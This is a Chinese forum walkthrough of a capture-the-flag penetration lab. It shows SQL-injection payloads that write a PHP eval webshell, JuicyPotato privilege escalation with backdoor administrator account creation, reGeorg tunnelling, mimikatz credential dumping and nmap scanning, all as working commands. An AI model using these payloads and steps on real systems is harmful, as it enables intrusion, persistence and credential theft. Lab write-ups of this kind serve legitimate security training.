【内网渗透上WP】(基础知识+靶场操作完整版)SQL拿shell、WIN提权

久违的双子座   ·   发表于 2020-12-17 18:36:40   ·   CTF&WP专版

一、基础知识

1、SQL拿SHELL

两个常用的注入函数

into outfile 将一句话木马写入 自动创建的 heason.php文件中

http://afsgr16-b1ferw.aqlab.cn/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[8]);?>' into outfile ‘C:\\phpStudy\\WWW\\heason.php’

注意点:

  • 1.上传文件路径,需要测试网站报错显示路径
  • 2.路径需双写

into dumpfile 使用同上,区别是能接受16进制

http://afsgr16-b1ferw.aqlab.cn/?id=1 and 1=2 union select 1,0x3c3f70687020406576616c28245f524551554553545b27636d64275d293b3f3e into outfile ‘C:\\phpStudy\\WWW\\heason.php’

注意点:

  • 1.16进制转换时,需注意空格是否保留,没有空格木马会失效
  • 2.小细节16进制前别忘加0x

2、Win常用命令与提权

(1)常用命令

whoami 查看当前用户权限
netstat -ano 查看本机开放的端口
tasklist 查看本机运行的程序[类似于任务管理器]
systeminfo 查看计算机信息
net user 查看本机所有用户及权限

(2)提权路线

  • 第一种:不同服务组件用了不同权限。例如网站权限低,数据库权限高,那么我们就要想办法让其他组件帮我们去做事。再例如:目标机器上运行了一些其他的服务,然后这些服务只能从内部访问,然后我们也可以调用过来用。(例如:FTP|Redis等等) [这个需要一定的知识积累,早期不推荐]

  • 第二种:利用Window的漏洞(最常见手法),查看windows打了什么补丁,然后去网上找存在什么样的漏洞,再找对应的提权工具。

推荐软件:JuicyPotato

利用菜刀将程序 JuicyPotato.exe 上传到目标机器上,在运行这个程序,即可执行后续操作,常用命令如下

JuicyPotato.exe -p “whoami”  //将现有账号权限提升至system
JuicyPotato.exe -p “net user 账号名 密码 /add” //新增账号和对应密码
JuicyPotato.exe -p “net localgroup administrators 账号名密码 /add”  //提升新增账号的权限至administrators组

【本帖使用第二种提权路线】菜刀或蚁剑链接后,往往权限较低,如guest,需要做下列事后才能支持后续的操作。

(1)现有账号提权:方便后续各种命令使用

(2)新增账号并将其提权:后续远程登录使用的账号

(3)查询该机器打的补丁,网上搜寻还有哪些已知漏洞可以直接利用。推荐搜索网站https://bugs.hacking8.com/tiquan/

3、内网与外网通信

内网往往有较多机器,但是只有一个路由负责端口转发连接至公网。这造成外网发起的访问只能访问这个路由指定的机器,而不能连接至其他机器。同时内网向外发起的连接则由这个路由进行端口映射,众多内网机器共用相同的IP进行对外网络连接。更有一种可能,有的内网机器根本不能连接外网。以上种种,就造成了,你通过菜刀或蚁剑实际控制的一个内网机器,但是却无法通过外网进行远程登录。为解决这种问题,下面有三种方式可以解决

(1)让内网的目标机器主动连接外网主机,这种情况需要一个外网IP地址。我们可以自行去购买外网IP。或者去找个学生身份或者是岁数低于24岁的小妹妹、弟弟去买阿里云学生机。

(2)利用网上的内网穿透平台,通过他们提供的服务,将我们使用的攻击机器的ip、端口与平台提供的ip、端口绑定。并在攻击机器开启监听这个本地端口。同时让内网目标机器主动连接这个平台,当目标内网机器主动连接这个平台时,我们就能监听到了。此处推荐平台https://qydev.com/index.html

(3)通过菜刀或蚁剑等,直接上传代理,通过代理进行攻击机与目标内网机器的通信。此处推荐使用软件reGeorg配合Proxifier进行使用。(此种方法会在后面演示时展示如何使用)

4、探测内网机器并抓取本机管理员账号和密码

推荐使用nmap和工具 minikatz,具体使用见后

二、内网渗透流程及靶场演示

1、进入靶场利用sql的into outfile/dumpfile 写入一句话木马

写入一句话木马:

http://afsgr16-b1ferw.aqlab.cn/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[8]);?>' into outfile 'C:\\phpStudy\\WWW\\heason.php'

验证是否成功:

http://afsgr16-b1ferw.aqlab.cn/heason.php?8=phpinfo();

2、利用蚁剑拿下SHELL


3、查看系统信息和开放端口,查看打的补丁,搜索可利用已知漏洞

systeminfo

netstat -ano

通过辅助提权网站,对exp进行寻找。

4、利用蚁剑传入JuicyPotato,并使用其虚拟终端,查看权限,提权。

上传JuicyPotato成功

使用账号提权成功

JuicyPotato.exe -p “whoami”

创建新账号heason 并提权

JuicyPotato.exe -p “net user heason A123456!!! /add” //新增账号和对应密码
JuicyPotato.exe -p “net localgroup administrators heason /add”//提升新增账号的权限至administrators组

查询目标机器内网ip

5、使用软件reGeorg实现攻击机与目标机器的通信

通过蚁剑上传tunnel.nosocket.php并改名为tn.php(方便后续使用)

本地reGeorg目录起cmd开启通讯

python2 reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://afsgr16-b1ferw.aqlab.cn/tn.php

注意点:

这里用的是python2,我电脑之前用的是python3 启动会报错,如何在电脑中同时安装2和3,请参考帖子https://jingyan.baidu.com/article/c1a3101e7dd290de656debdd.html?qq-pf-to=pcqq.c2c
如果在执行时,py2缺乏库,又没有pip,建议网上搜索如何安装pip,之后再设置环境变量。如有问题可留言。

6、使用软件Proxifier监听10086端口

首先 设置配置文件->代理服务器

然后 设置配置文件->代理规则

7、好了,可以开启远程桌面连接了

使用建好的 heason A123456!!!登陆哦



8、复制进去工具 minikatz ,右键已管理员启动

privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码

9.传入nmap,扫描网段找出内网其他机器

Nmap 10.0.1./24

10.抓到密码

administrator的密码是woshifengge1.
最后在10.0.1.8里面拿到flag
flag{You_good}

完结 撒花!!!

打赏我,让我更有动力~

1 条回复   |  直到 2021-2-17 | 2325 次浏览

hhades
发表于 2021-1-12

写得很详细

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.